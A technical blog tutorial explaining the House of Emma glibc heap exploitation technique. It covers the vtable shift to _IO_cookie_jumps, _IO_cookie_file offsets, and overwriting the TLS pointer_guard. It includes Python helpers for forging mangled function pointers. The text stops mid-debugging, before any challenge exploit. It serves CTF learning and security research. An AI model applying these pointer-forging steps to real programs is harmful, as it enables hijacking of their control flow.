Foreword

Before embarking on this deep dive into the heap exploitation technique known as House of Emma, we should have a basic understanding of House of Kiwi from another post, since it provides the I/O trigger that we are going to exploit with House of Emma.

There are several well-regarded articles discussing the House of Emma exploitation technique. However, I've identified some key misunderstandings in how they describe the attack chain. Why do we set the vtable pointer to _IO_cookie_jumps with an offset of 0x40? Why place our malicious gadget at offset 0xF0, beyond the end of a standard file struct? And what is the actual endpoint of this chain, the place where RIP is hijacked? Contrary to popular belief, it is NOT the __cookie pointer.

Even though we can now hijack I/O operations in a relatively simpler way with another attack chain, House of Apple, the seemingly more complex House of Emma, which requires deeper research into the TLS/TCB structure, remains an enlightening and powerful heap exploitation methodology for recent GLIBC versions such as 2.35.

In the writeup section of this article, I'll walk through a PWN challenge that exploits GLIBC 2.34, which helps us to explore these questions in depth and untangle the complexities of this technique.

Overview

In the GLIBC 2.34 release, made public on August 1, 2021, hooks commonly abused in CTF pwn challenges, such as __free_hook and __malloc_hook, were removed. Furthermore, in glibc-2.34-0ubuntu3.2_amd64 and later, hijacking the vtable pointer of an IO struct is restricted by IO_validate_vtable (a check glibc has carried since version 2.24), which we introduced here.

Due to changes in the new version, we are forced to rethink our exploitation approach. Traditionally, we aimed for arbitrary address allocation to achieve arbitrary read/write, which eventually led to a shell. Now, the goal has shifted to directly writing to a controlled address that leads to a shell or execution flow hijacking, leveraging the IO_FILE structure used in low-level I/O operations.

Soon after that release, a talented hacker introduced a fantastic attack chain in this article and named it "House of Emma".

However, the author did not explicitly explain the attack chain, and even other well-regarded articles, such as the analysis by Qianxin, a leading cybersecurity company in China, have, in my view, misinterpreted the actual execution flow.

_IO_cookie_jumps

A quick recap of the security check IO_validate_vtable:

static inline const struct _IO_jump_t *
IO_validate_vtable (const struct _IO_jump_t *vtable)
{
  /* Fast path: The vtable pointer is within the __libc_IO_vtables
     section.  */
  uintptr_t section_length = __stop___libc_IO_vtables - __start___libc_IO_vtables;
  uintptr_t ptr = (uintptr_t) vtable;
  uintptr_t offset = ptr - (uintptr_t) __start___libc_IO_vtables;
  if (__glibc_unlikely (offset >= section_length))
    /* The vtable pointer is not in the expected section.  Use the
       slow path, which will terminate the process if necessary.  */
    _IO_vtable_check ();
  return vtable;
}

We can no longer overwrite the vtable pointer in the _IO_FILE_plus struct with arbitrary values, only with addresses inside the __libc_IO_vtables section. House of Emma works within this restriction: by setting the vtable pointer to a legitimate _IO_xxxx_jumps table plus a small offset, we shift the normal execution flow onto other functions in that section. These functions then operate on an IO_FILE structure that we control through a separate arbitrary-address-write primitive, such as the Largebin Attack introduced in this post.
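To make the fast-path check concrete, below is a minimal Python model of the range test in IO_validate_vtable. The section bounds and the _IO_cookie_jumps address are hypothetical placeholders rather than values from a real libc build; the point is only that a pointer into the middle of a legitimate jump table (such as _IO_cookie_jumps+0x40) still passes, while a forged table on the heap does not.

```python
# Minimal model of the fast path in IO_validate_vtable (Python 3).
# All addresses below are hypothetical placeholders, not from a real libc.
START_LIBC_IO_VTABLES = 0x7FFFF7F9A000  # assumed __start___libc_IO_vtables
STOP_LIBC_IO_VTABLES = 0x7FFFF7F9AD68   # assumed __stop___libc_IO_vtables
IO_COOKIE_JUMPS = 0x7FFFF7F9AA20        # assumed address of _IO_cookie_jumps

MASK64 = (1 << 64) - 1


def passes_fast_path(vtable: int) -> bool:
    """Return True if `vtable` lies inside __libc_IO_vtables.

    The subtraction wraps modulo 2**64, like uintptr_t arithmetic in C, so a
    pointer below the section becomes a huge offset and fails as well.
    """
    section_length = (STOP_LIBC_IO_VTABLES - START_LIBC_IO_VTABLES) & MASK64
    offset = (vtable - START_LIBC_IO_VTABLES) & MASK64
    return offset < section_length  # False -> glibc calls _IO_vtable_check()


fake_heap_vtable = 0x55555555A2A0  # a forged jump table on the heap

print(passes_fast_path(IO_COOKIE_JUMPS + 0x40))  # True
print(passes_fast_path(fake_heap_vtable))        # False
```

Failing the fast path does not abort by itself: as the source comment says, glibc falls back to _IO_vtable_check, which terminates the process when necessary.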

Unlike techniques such as House of Apple or House of Cat, where the vtable is replaced with _IO_wfile_jumps, in this case, we leverage _IO_cookie_jumps, which follows a similar structure:

static const struct _IO_jump_t _IO_cookie_jumps libio_vtable = {
  JUMP_INIT_DUMMY,                              // Offset: 0x00, Size: 0x10 (Dummy entry)
  JUMP_INIT(finish, _IO_file_finish),           // Offset: 0x10, Size: 0x08
  JUMP_INIT(overflow, _IO_file_overflow),       // Offset: 0x18, Size: 0x08
  JUMP_INIT(underflow, _IO_file_underflow),     // Offset: 0x20, Size: 0x08
  JUMP_INIT(uflow, _IO_default_uflow),          // Offset: 0x28, Size: 0x08
  JUMP_INIT(pbackfail, _IO_default_pbackfail),  // Offset: 0x30, Size: 0x08
  JUMP_INIT(xsputn, _IO_file_xsputn),           // Offset: 0x38, Size: 0x08
  JUMP_INIT(xsgetn, _IO_default_xsgetn),        // Offset: 0x40, Size: 0x08
  JUMP_INIT(seekoff, _IO_cookie_seekoff),       // Offset: 0x48, Size: 0x08
  JUMP_INIT(seekpos, _IO_default_seekpos),      // Offset: 0x50, Size: 0x08
  JUMP_INIT(setbuf, _IO_file_setbuf),           // Offset: 0x58, Size: 0x08
  JUMP_INIT(sync, _IO_file_sync),               // Offset: 0x60, Size: 0x08
  JUMP_INIT(doallocate, _IO_file_doallocate),   // Offset: 0x68, Size: 0x08
  JUMP_INIT(read, _IO_cookie_read),             // Offset: 0x70, Size: 0x08
  JUMP_INIT(write, _IO_cookie_write),           // Offset: 0x78, Size: 0x08
  JUMP_INIT(seek, _IO_cookie_seek),             // Offset: 0x80, Size: 0x08
  JUMP_INIT(close, _IO_cookie_close),           // Offset: 0x88, Size: 0x08
  JUMP_INIT(stat, _IO_default_stat),            // Offset: 0x90, Size: 0x08
  JUMP_INIT(showmanyc, _IO_default_showmanyc),  // Offset: 0x98, Size: 0x08
  JUMP_INIT(imbue, _IO_default_imbue)           // Offset: 0xA0, Size: 0x08
};

This particular vtable uses the struct _IO_jump_t. The function pointers inside are initialized via the JUMP_INIT macro, and each corresponds to a specific operation in the vtable.
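Because libio dispatches by adding a fixed slot offset to whatever the vtable pointer holds, shifting the pointer shifts every lookup. The following sketch models that with the offsets from the table above (the dictionary and helper names are illustrative, not glibc APIs) and shows which entry actually runs for a given shift.

```python
# Entries of _IO_cookie_jumps keyed by byte offset (copied from the table above).
IO_COOKIE_JUMPS_LAYOUT = {
    0x10: "_IO_file_finish",
    0x18: "_IO_file_overflow",
    0x20: "_IO_file_underflow",
    0x28: "_IO_default_uflow",
    0x30: "_IO_default_pbackfail",
    0x38: "_IO_file_xsputn",
    0x40: "_IO_default_xsgetn",
    0x48: "_IO_cookie_seekoff",
    0x50: "_IO_default_seekpos",
    0x58: "_IO_file_setbuf",
    0x60: "_IO_file_sync",
    0x68: "_IO_file_doallocate",
    0x70: "_IO_cookie_read",
    0x78: "_IO_cookie_write",
    0x80: "_IO_cookie_seek",
    0x88: "_IO_cookie_close",
    0x90: "_IO_default_stat",
    0x98: "_IO_default_showmanyc",
    0xA0: "_IO_default_imbue",
}

XSPUTN_SLOT = 0x38  # offset of the xsputn member in struct _IO_jump_t
SYNC_SLOT = 0x60    # offset of the sync member in struct _IO_jump_t


def resolve(vtable_shift: int, slot: int) -> str:
    """Name of the entry libio actually calls when it dispatches `slot`
    through vtable = _IO_cookie_jumps + vtable_shift."""
    return IO_COOKIE_JUMPS_LAYOUT.get(vtable_shift + slot, "<outside this table>")


print(resolve(0x00, XSPUTN_SLOT))  # _IO_file_xsputn  (normal dispatch)
print(resolve(0x40, XSPUTN_SLOT))  # _IO_cookie_write (shifted by 0x40)
```

The same +0x40 shift sends a sync call (slot 0x60) to offset 0xA0, _IO_default_imbue, so a shift only works for the slot it was chosen for.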

_IO_cookie_xxxx

Normally, the _IO_cookie_jumps vtable pointer is set when the fopencookie function is called. In an attack scenario, once we successfully point the vtable at _IO_cookie_jumps, several functions in this vtable (_IO_cookie_read, _IO_cookie_write, _IO_cookie_seek, and _IO_cookie_close) can lead to an arbitrary function call, provided we control the memory at specific offsets of the hijacked IO_FILE.

Function _IO_cookie_read at offset 0x70:

static ssize_t
_IO_cookie_read (FILE *fp, void *buf, ssize_t size)
{
  struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
  cookie_read_function_t *read_cb = cfile->__io_functions.read;
#ifdef PTR_DEMANGLE
  PTR_DEMANGLE (read_cb);
#endif
 
  if (read_cb == NULL)
    return -1;
 
  return read_cb (cfile->__cookie, buf, size);
}

Function _IO_cookie_write at offset 0x78:

static ssize_t
_IO_cookie_write (FILE *fp, const void *buf, ssize_t size)
{
  struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
  cookie_write_function_t *write_cb = cfile->__io_functions.write;
#ifdef PTR_DEMANGLE
  PTR_DEMANGLE (write_cb);
#endif
 
  if (write_cb == NULL)
    {
      fp->_flags |= _IO_ERR_SEEN;
      return 0;
    }
 
  ssize_t n = write_cb (cfile->__cookie, buf, size);
  if (n < size)
    fp->_flags |= _IO_ERR_SEEN;
 
  return n;
}

Function _IO_cookie_seek at offset 0x80:

static off64_t
_IO_cookie_seek (FILE *fp, off64_t offset, int dir)
{
  struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
  cookie_seek_function_t *seek_cb = cfile->__io_functions.seek;
#ifdef PTR_DEMANGLE
  PTR_DEMANGLE (seek_cb);
#endif
 
  return ((seek_cb == NULL
       || (seek_cb (cfile->__cookie, &offset, dir)
           == -1)
       || offset == (off64_t) -1)
      ? _IO_pos_BAD : offset);
}

Function _IO_cookie_close at offset 0x88:

static int
_IO_cookie_close (FILE *fp)
{
  struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
  cookie_close_function_t *close_cb = cfile->__io_functions.close;
#ifdef PTR_DEMANGLE
  PTR_DEMANGLE (close_cb);
#endif
 
  if (close_cb == NULL)
    return 0;
 
  return close_cb (cfile->__cookie);
}

All four functions eventually call a function pointer named xxxx_cb, loaded from cfile, which is simply fp cast to struct _IO_cookie_file, an extension of the original _IO_FILE. The first argument passed to xxxx_cb is cfile->__cookie.

struct _IO_cookie_file

The variable cfile is used to look up those function pointers. From the internal C library functions above, we can see that it is of type struct _IO_cookie_file:

/* Special file type for fopencookie function.  */
struct _IO_cookie_file
{
  struct _IO_FILE_plus __fp;
  void *__cookie;	// offset: 0xE0
  cookie_io_functions_t __io_functions;	// offset: 0xE8
};

It is larger than the standard _IO_FILE_plus, whose last member (the vtable pointer) sits at offset 0xD8, making _IO_FILE_plus 0xE0 bytes long. The new members therefore start at offset 0xE0.

__io_functions

Starting at offset 0xE8 of struct _IO_cookie_file sits __io_functions. Note that it is an embedded structure of type cookie_io_functions_t, not a pointer to one:

type = struct _IO_cookie_io_functions_t {
    cookie_read_function_t *read;		// Offset: 0x00, 0xE8 in _IO_cookie_file 
    cookie_write_function_t *write;		// Offset: 0x08, 0xF0 in _IO_cookie_file 
    cookie_seek_function_t *seek;		// Offset: 0x10, 0xF8 in _IO_cookie_file 
    cookie_close_function_t *close;		// Offset: 0x18, 0x100 in _IO_cookie_file 
}

This structure is the real destination of the House of Emma attack chain: its function pointers are what we overwrite to redirect RIP to a gadget of our choice.
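The offsets quoted above can be double-checked with a small ctypes model. This is a sketch under two assumptions: a 64-bit Python (8-byte pointers, as on x86_64), and struct _IO_FILE represented as an opaque 0xD8-byte blob instead of its real members. The field names are simplified from __fp, __cookie, and __io_functions.

```python
import ctypes


class IO_FILE_plus(ctypes.Structure):
    # struct _IO_FILE treated as an opaque 0xD8-byte blob (x86_64 assumption),
    # followed by the vtable pointer.
    _fields_ = [("file", ctypes.c_char * 0xD8), ("vtable", ctypes.c_void_p)]


class cookie_io_functions_t(ctypes.Structure):
    _fields_ = [
        ("read", ctypes.c_void_p),
        ("write", ctypes.c_void_p),
        ("seek", ctypes.c_void_p),
        ("close", ctypes.c_void_p),
    ]


class IO_cookie_file(ctypes.Structure):
    # Simplified names for __fp / __cookie / __io_functions.
    _fields_ = [
        ("fp", IO_FILE_plus),
        ("cookie", ctypes.c_void_p),
        ("io_functions", cookie_io_functions_t),
    ]


def callback_offset(name: str) -> int:
    """Absolute offset of a cookie callback inside struct _IO_cookie_file."""
    return IO_cookie_file.io_functions.offset + getattr(cookie_io_functions_t, name).offset


print(hex(IO_FILE_plus.vtable.offset))    # 0xd8
print(hex(IO_cookie_file.cookie.offset))  # 0xe0
for name in ("read", "write", "seek", "close"):
    print(name, hex(callback_offset(name)))  # 0xe8, 0xf0, 0xf8, 0x100
print(hex(ctypes.sizeof(IO_cookie_file)))  # 0x108
```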

PTR_DEMANGLE

If we look carefully, there is a special preprocessor directive (#ifdef) and a function-like macro (PTR_DEMANGLE) inside each function snippet:

#ifdef PTR_DEMANGLE
 PTR_DEMANGLE (write_cb);
#endif
  • If PTR_DEMANGLE is defined, the code between the #ifdef and the corresponding #endif is included in the compilation.
  • If PTR_DEMANGLE is not defined, the code block is ignored.

This is a security measure that prevents attackers from manipulating function pointers:

extern uintptr_t __pointer_chk_guard attribute_relro;
#  define PTR_MANGLE(var) \
  (var) = (__typeof (var)) ((uintptr_t) (var) ^ __pointer_chk_guard)
#  define PTR_DEMANGLE(var) PTR_MANGLE (var)

Taking the _IO_cookie_write function as an example, we can disassemble it in GDB:

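The macro takes the pointer variable (loaded from [rdi+0xf0]), treats it as a uintptr_t, and XORs it with the pointer guard from the TLS segment. On x86_64, the disassembly also shows a rotation: the stored value is first rotated right by 0x11 bits and then XORed with fs:[0x30]: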

mov rax, [rdi+0xf0]
ror rax, 0x11
xor rax, fs:[0x30]

The pointer guard value is initialized by the dynamic linker, which exposes two variables: __pointer_chk_guard_local is hidden and lets dynamic linker code access the guard value more efficiently, while __pointer_chk_guard is global and is meant to be used by the dynamically linked C library.

pointer_guard

The pointer_guard (__pointer_chk_guard) is the value stored at fs:[0x30] (fs:[offsetof(tcbhead_t, pointer_guard)]), used by the PTR_MANGLE and PTR_DEMANGLE macros to encrypt and decrypt function pointers, as discussed earlier.

This topic requires a solid understanding of TLS/TCB. I highly recommend the research by Chao-tic. Though it's a lengthy read, it's wonderfully written and well worth the time; I found myself reading it twice.

Here, I'll provide a brief introduction to the parts most relevant to our attack.

__pointer_chk_guard

Where can we find the pointer guard (__pointer_chk_guard)?

It's stored within a data structure known as the Thread Control Block (TCB), which holds important information and metadata to manage a thread and its associated local storage (TLS).

On Linux x86_64, tcbhead_t is glibc's concrete implementation of the TCB:

type = struct {
/*      0      |       8 */    void *tcb;
/*      8      |       8 */    dtv_t *dtv;
/*     16      |       8 */    void *self;
/*     24      |       4 */    int multiple_threads;
/*     28      |       4 */    int gscope_flag;
/*     32      |       8 */    uintptr_t sysinfo;
/*     40      |       8 */    uintptr_t stack_guard;		// offset 0x28
/*     48      |       8 */    uintptr_t pointer_guard;		// offset 0x30
/*     56      |      16 */    unsigned long unused_vgetcpu_cache[2];
/*     72      |       4 */    unsigned int feature_1;
/*     76      |       4 */    int __glibc_unused1;
/*     80      |      32 */    void *__private_tm[4];
/*    112      |       8 */    void *__private_ss;
/*    120      |       8 */    unsigned long long ssp_base;
/*    128      |     512 */    __128bits __glibc_unused2[8][4];
/*    640      |      64 */    void *__padding[8];

                               /* total size (bytes):  704 */
                             }

At offsets 0x28 and 0x30, we encounter familiar components: the stack_guard, which holds the canary value, and the pointer_guard, which is the key used to XOR-encrypt function pointers. These values are randomly generated each time the program starts. In GDB, we can view them by inspecting the fsbase:

On x86_64 Linux, the fs register is used for thread-local storage (TLS), giving each thread fast access to its own data in a flat memory model (x86_64 Windows and macOS use the GS register for this purpose instead):

  • The fs register stores a base address that points to the TLS area.
  • Using this base address, thread-local variables can be quickly accessed by adding an offset to the value in the fs register.

Thus, the pointer_guard value is located at fs:[0x30], a fixed offset into the TLS area that is mapped adjacent to libc. This offset remains constant for a given environment, which enables predictable manipulation. However, leaking or directly modifying it is challenging: the FS base is managed by the kernel (ring 0), while we operate at ring 3 (user land). We can read memory through FS, but without code execution we cannot relocate the FS base itself.

As attackers, though, we can attempt to modify the value at this exact address using various exploit primitives, such as:

  • Fastbin Reverse Into Tcache
  • Tcache Stashing Unlink Attack
  • LargeBin Attack

Overall, the main idea is to leverage vulnerabilities to replace this random value with a known one, defeating the protection provided by pointer encryption.
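Before aiming any of these primitives at fs:[0x30], the exploit needs its absolute address. Assuming the TLS area sits at a constant distance from libc, as described above, that address follows from a libc leak. TLS_OFFSET below is a hypothetical number that has to be measured once in GDB (fs base minus libc base) for the exact environment being attacked; the helper name is also illustrative.

```python
# Hypothetical: measure (fs_base - libc_base) once in GDB for the exact
# libc/ld.so/kernel combination you target; this number is only an example.
TLS_OFFSET = -0x28C0

STACK_GUARD_OFF = 0x28    # offsetof(tcbhead_t, stack_guard)
POINTER_GUARD_OFF = 0x30  # offsetof(tcbhead_t, pointer_guard)


def tcb_targets(libc_base: int) -> dict:
    """Derive the fs base and the guard slots from a leaked libc base."""
    fs_base = libc_base + TLS_OFFSET
    return {
        "fs_base": fs_base,
        "stack_guard": fs_base + STACK_GUARD_OFF,
        "pointer_guard": fs_base + POINTER_GUARD_OFF,
    }


targets = tcb_targets(0x7FFFF7D8C000)  # example leaked libc base
print(hex(targets["pointer_guard"]))  # write target, e.g. for a Largebin Attack
```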

__pointer_chk_guard_local

In fact, a copy of the pointer guard is also stored in the global variable __pointer_chk_guard_local, which lives in read-only (RELRO) memory and cannot be overwritten.

This copy allows for easy and fast access. When we overwrite the value at fs:[0x30], the __pointer_chk_guard_local remains unchanged.

Algorithm

Now that we know what the pointer_guard is and where it resides, we can write down how the x86_64 PTR_MANGLE macro encrypts function pointers and how PTR_DEMANGLE decrypts them.

For the encryption process (PTR_MANGLE):

rol(ptr ^ pointer_guard, 0x11, 64)

For the decryption process (PTR_DEMANGLE):

ror(enc, 0x11, 64) ^ pointer_guard
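The two formulas can be checked with a short Python sketch of the x86_64 macros. As sample input it reuses the pointer_guard and my_write address that appear in the Debug section of this post, so the mangled value should match the one stored in the demo's _IO_cookie_file.

```python
def rol(value: int, shift: int, bits: int = 64) -> int:
    """Rotate `value` left by `shift` bits inside a `bits`-wide word."""
    return ((value << shift) | (value >> (bits - shift))) & ((1 << bits) - 1)


def ror(value: int, shift: int, bits: int = 64) -> int:
    """Rotate `value` right by `shift` bits inside a `bits`-wide word."""
    return ((value >> shift) | (value << (bits - shift))) & ((1 << bits) - 1)


def ptr_mangle(ptr: int, guard: int) -> int:
    # x86_64 PTR_MANGLE: XOR with the guard first, then rotate left by 0x11.
    return rol(ptr ^ guard, 0x11)


def ptr_demangle(enc: int, guard: int) -> int:
    # x86_64 PTR_DEMANGLE: undo the rotation first, then XOR with the guard.
    return ror(enc, 0x11) ^ guard


guard = 0xB63577E972BA6797  # pointer_guard observed in the Debug section
ptr = 0x555555555269        # my_write in the fopencookie demo

enc = ptr_mangle(ptr, guard)
print(hex(enc))                       # 0x45784fde6bfd6c6a
print(hex(ptr_demangle(enc, guard)))  # 0x555555555269
```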

In an exploit scenario, if we can hijack the pointer_guard and replace it with an evil_guard (using techniques like a Largebin Attack, for example), we can then write the enc value to a controlled memory area—namely a fake _IO_cookie_file structure in House of Emma. By encrypting our malicious function pointer (ptr), we can ultimately hijack the RIP:

enc = rol(ptr ^ evil_guard, 0x11, 64)
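Forging enc is the same computation with the attacker-chosen guard. A minimal sketch, where evil_guard and gadget are hypothetical addresses (after a Largebin Attack on fs:[0x30], the guard typically becomes the address of the victim chunk); the final assertion replays what _IO_cookie_write computes at runtime.

```python
def rol(value: int, shift: int, bits: int = 64) -> int:
    return ((value << shift) | (value >> (bits - shift))) & ((1 << bits) - 1)


def ror(value: int, shift: int, bits: int = 64) -> int:
    return ((value >> shift) | (value << (bits - shift))) & ((1 << bits) - 1)


def forge_enc(target: int, evil_guard: int) -> int:
    """Value to store in a cookie callback slot so that PTR_DEMANGLE,
    using the hijacked guard, yields `target`."""
    return rol(target ^ evil_guard, 0x11)


# Hypothetical values: evil_guard is what our write planted at fs:[0x30],
# gadget is the libc address we want to end up in RIP.
evil_guard = 0x55555555B2A0
gadget = 0x7FFFF7F1B0C0

enc = forge_enc(gadget, evil_guard)
# Replay _IO_cookie_write at runtime: ror 0x11, then xor with fs:[0x30].
assert (ror(enc, 0x11) ^ evil_guard) == gadget
print(hex(enc))
```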

Prerequisites

To successfully carry out the House of Emma attack, the following primitives are typically required:

  • The ability to write to a controlled address arbitrarily (using techniques like LargeBin Attack, Tcache Stashing Unlink Attack, etc.).
  • The ability to trigger an I/O stream (via FSOP or House of Kiwi).

Trigger

Therefore, triggering an I/O stream is essential for exploiting heap vulnerabilities related to IO structures.

I've previously introduced methods to trigger I/O operations without the program's awareness in House of Kiwi. I won't delve into that topic here, but if needed, you can explore the detailed methodology through the link.

Simply put, one straightforward way to trigger an I/O operation is by leveraging the exit function, if present in the binary:

exit
  └───► fcloseall
            └───► _IO_cleanup
                       └───►_IO_flush_all_lockp
                                    └───►_IO_OVERFLOW

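Alternatively, __malloc_assert comes into play when an assertion inside the allocator fails, for example sysmalloc's sanity check on the top chunk after we corrupt the top chunk size (the House of Kiwi setup):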

_int_malloc
     └───►sysmalloc
             └───►__malloc_assert
                         └───► fflush(stderr)
                                  └───►_IO_file_sync

Additionally, there's another execution chain that runs before fflush is triggered:

_int_malloc
   └───► sysmalloc
            └───► __malloc_assert
                        └───► __fxprintf
                                   └───► __vfxprintf
                                              └───► __vfxprintf_internal
                                                          └───► _IO_file_xsputn

In this post introducing House of Emma, we will use the latter method to trigger I/O operations, as the upcoming PWN challenge I will analyze does not have an exit function but runs in an infinite loop.

Attack Chain

We opt to trigger __malloc_assert to initiate the I/O operation (using the House of Kiwi attack). Before the IO structure is hijacked, the binary will print an error message.

Once we hijack the vtable pointer to _IO_cookie_jumps, the I/O calls that __malloc_assert makes on stderr dispatch into the IO structure under our control, as follows:

Let me explain explicitly what happens here. Before hijacking, the flow looks like this:

stderr->_IO_file_jumps->_IO_file_xsputn

After hijacking stderr, we can overwrite its vtable pointer at offset 0xD8 with the pointer to _IO_cookie_jumps, resulting in the following flow:

(hijacked)stderr->_IO_cookie_jumps->_IO_new_file_xsputn

However, _IO_new_file_xsputn does not give us an arbitrary function call, so this alone does not serve our goal. This is where House of Emma introduces its key technique: offsetting the vtable pointer.

Specifically, after hijacking stderr, we can write _IO_cookie_jumps+0x40 into the vtable pointer position. This offsets the execution flow, redirecting it to _IO_cookie_write:

Notice that rdi (and rbx) point to a heap address we control, namely the fake stderr. The flow is now:

(hijacked)stderr->_IO_cookie_jumps+0x40->_IO_cookie_write

Therefore, the full Attack Chain for House of Emma can be depicted as:

__malloc_assert
     └───► __fxprintf
               └───► _IO_file_xsputn (before)
                          └───► _IO_cookie_write (after)
                                     └───► write_cb (cfile->__cookie, buf, size)

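Alternatively, we can target fflush(stderr), which dispatches through the sync slot (offset 0x60) rather than xsputn; the vtable offset must then be chosen so that the sync slot lands on a _IO_cookie_* entry (for example, _IO_cookie_jumps+0x18 makes sync resolve to _IO_cookie_write). Likewise, we can pick any of the other _IO_cookie_xxxx functions (read, seek, close), not just write, by adjusting the offset accordingly.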
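To choose the offset systematically, subtract the trigger's slot offset from the offset of the desired _IO_cookie_* entry. The sketch below does this for the xsputn path (__fxprintf) and the sync path (fflush), and also reports which __io_functions slot of the fake structure must hold the encrypted pointer; the names are illustrative.

```python
# Dispatch slots inside struct _IO_jump_t (offsets from the _IO_cookie_jumps table).
TRIGGER_SLOTS = {"xsputn": 0x38, "sync": 0x60}

# Where each _IO_cookie_* entry sits in _IO_cookie_jumps, and which
# __io_functions slot of the fake _IO_cookie_file it decrypts and calls.
COOKIE_ENTRIES = {
    "_IO_cookie_read": (0x70, 0xE8),
    "_IO_cookie_write": (0x78, 0xF0),
    "_IO_cookie_seek": (0x80, 0xF8),
    "_IO_cookie_close": (0x88, 0x100),
}


def plan(trigger: str, target: str) -> tuple:
    """Return (vtable shift, fake-file offset of the encrypted pointer)."""
    entry_off, cb_off = COOKIE_ENTRIES[target]
    shift = entry_off - TRIGGER_SLOTS[trigger]
    if shift < 0 or shift % 8:
        raise ValueError("no aligned non-negative shift reaches this entry")
    return shift, cb_off


for trig in TRIGGER_SLOTS:
    for tgt in COOKIE_ENTRIES:
        shift, cb_off = plan(trig, tgt)
        print(f"{trig:6} -> {tgt:16}: vtable = _IO_cookie_jumps+{shift:#x}, enc at +{cb_off:#x}")
```

Whichever entry is chosen, its callback receives cfile->__cookie as the first argument, but the remaining arguments differ: read and write get (buf, size), seek gets (&offset, dir), and close gets nothing else.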

So, what happens after hijacking the vtable pointer to _IO_cookie_jumps+0x40, ultimately leading to the desired endpoint, write_cb? Let's first take a preliminary look at an attack demo running in GDB to better understand the overall scenario.

Once we've set up the deployment as discussed earlier, we can dive deeper into the behavior of the _IO_cookie_write function and observe its unusual, manipulated execution flow:

The value stored at [rdi+0xe0] is used as the first argument for the upcoming function call to write_cb. Before this operation, rdi points to the cfile (the fake _IO_cookie_file structure), as it is the first argument of the current function call, _IO_cookie_write.

At offset 0xE0 of the fake _IO_cookie_file, we have the void* __cookie pointer, which we can hijack to pass as the first argument to our malicious function.

It then loads the encrypted function pointer with mov rax, [rdi+0xf0], decrypts it with the hijacked pointer_guard, and transfers control to it (i.e., calls write_cb):

Notice that I placed a crafted value at this position, which PTR_DEMANGLE decrypts into the evil gadget getkeyserv_handle+576:

After controlling the rdx register with this evil gadget, we can then continue the classic exploit chain using the setcontext+61 gadget. We will show the remaining part in our exploit script for the PWN challenge.

All the gadgets mentioned here are introduced in this post.

In conclusion, we need to fake stderr as an _IO_cookie_file structure, in particular controlling the values at offsets 0xE0 and 0xF0. But why these offsets?

Debug

To understand how the House of Emma works, we need to take a closer look at the execution flow triggered by the _IO_cookie_jumps pointer.

As mentioned earlier, when the vtable pointer is overwritten with _IO_cookie_jumps (or that address plus an offset), the program dispatches through this jump table and executes the corresponding function pointers. The read, write, seek, and close functions in turn operate on the _IO_cookie_file structure, a specialized _IO_FILE designed for user-defined I/O operations.

Typically, this structure is used when fopencookie is called to create a custom I/O stream with user-specified operations for reading, writing, seeking, and closing.

Demo Code

Now, let's examine the normal case, before the I/O stream is exploited. I wrote a small C program and compiled it to test the fopencookie function:

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Custom write function
ssize_t my_write(void *cookie, const char *buf, size_t size) {
    printf("Custom write function called with size: %zu\n", size);
    printf("Buffer contents: %.*s\n", (int)size, buf);

    // Accessing the cookie data for demonstration purposes
    if (cookie != NULL) {
        unsigned int *my_cookie = (unsigned int *)cookie;
        printf("Cookie value: %#x\n", *my_cookie);
    }

    return size;
}

// Custom read function
ssize_t my_read(void *cookie, char *buf, size_t size) {
    static int called = 0;  // Track how many times my_read has been called
    const char *data = "Hello, world!";
    size_t len = strlen(data);

    if (called > 0) {
        // Simulate end-of-file after the first read
        return 0;  // No more data to read
    }

    if (size > len) size = len;
    memcpy(buf, data, size);
    called++;  // Increment the counter to prevent further reads

    printf("Custom read function called, providing data.\n");
    return size;  // Return the number of bytes read
}

int main() {
    // Set up the cookie with custom data
    unsigned int cookie_data = 0xdeadbeef;  // 0xdeadbeef does not fit in a signed int
    
    // Set up the cookie IO functions
    cookie_io_functions_t io_funcs = {
        .read = my_read,
        .write = my_write,
        .seek = NULL,
        .close = NULL
    };

    // Create a custom stream with fopencookie, using the custom cookie
    FILE *custom_stream = fopencookie(&cookie_data, "w+", io_funcs);

    if (!custom_stream) {
        perror("Failed to open custom stream");
        return 1;
    }

    // Write to the custom stream to trigger the custom write function
    fprintf(custom_stream, "Test writing to custom stream.\n");
    fflush(custom_stream);

    // Close the custom stream
    fclose(custom_stream);

    return 0;
}
// gcc -g -o fopencookie fopencookie.c

This C code defines custom functions like my_read, my_write, etc. They're designed to simulate the behavior of reading/writing from a custom file-like object created using fopencookie in GLIBC. The custom functions are part of the cookie_io_functions_t structure, which allows us to define our own read, write, seek, and close operations for file streams.

Goal

The objective of this debugging session is to understand how the my_write function, registered through the cookie_io_functions_t structure, is invoked internally by _IO_cookie_write in glibc:

To solve our questions for House of Emma, we will:

  • Investigate the _IO_cookie_file structure to understand how it stores the custom I/O functions (such as my_read and my_write).
  • Debug the behavior of the __io_functions field within GLIBC to understand how the fopencookie mechanism uses it to handle custom file operations.

Go-Through

In the House of Emma exploit, control flow reaches our target through _IO_cookie_write. To analyze this further, we can set a breakpoint at this function and inspect it in GDB:

It behaves exactly as described in the previous chapters. Its first argument, FILE *fp, is passed in the rdi register. Let's look at the source code of _IO_cookie_write again:

static ssize_t
_IO_cookie_write (FILE *fp, const void *buf, ssize_t size)
{
  struct _IO_cookie_file *cfile = (struct _IO_cookie_file *) fp;
  cookie_write_function_t *write_cb = cfile->__io_functions.write;
#ifdef PTR_DEMANGLE
  PTR_DEMANGLE (write_cb);
#endif
 
  if (write_cb == NULL)
    {
      fp->_flags |= _IO_ERR_SEEN;
      return 0;
    }
 
  ssize_t n = write_cb (cfile->__cookie, buf, size);
  if (n < size)
    fp->_flags |= _IO_ERR_SEEN;
 
  return n;
}

In this function, the FILE *fp argument is cast to the _IO_cookie_file structure. This cast transforms the generic FILE stream pointer into the more specific _IO_cookie_file structure, which is used when working with custom I/O operations through fopencookie.

Let's inspect fp at runtime:

A closer look at fp, i.e., cfile, interpreted as struct _IO_cookie_file:

The vtable now points to _IO_cookie_jumps, exactly as expected. Beyond the standard file structure, at offset 0xE0, sits the __cookie pointer, which points to our cookie data. It becomes the first of the three arguments of our demo function my_write, mirroring the write_cb (cfile->__cookie, buf, size) call in GLIBC:

It contains the 4-byte int type data we set in the C code:

The __io_functions block starting at offset 0xE8 is an embedded structure holding 4 function pointers, which appear to be obfuscated:

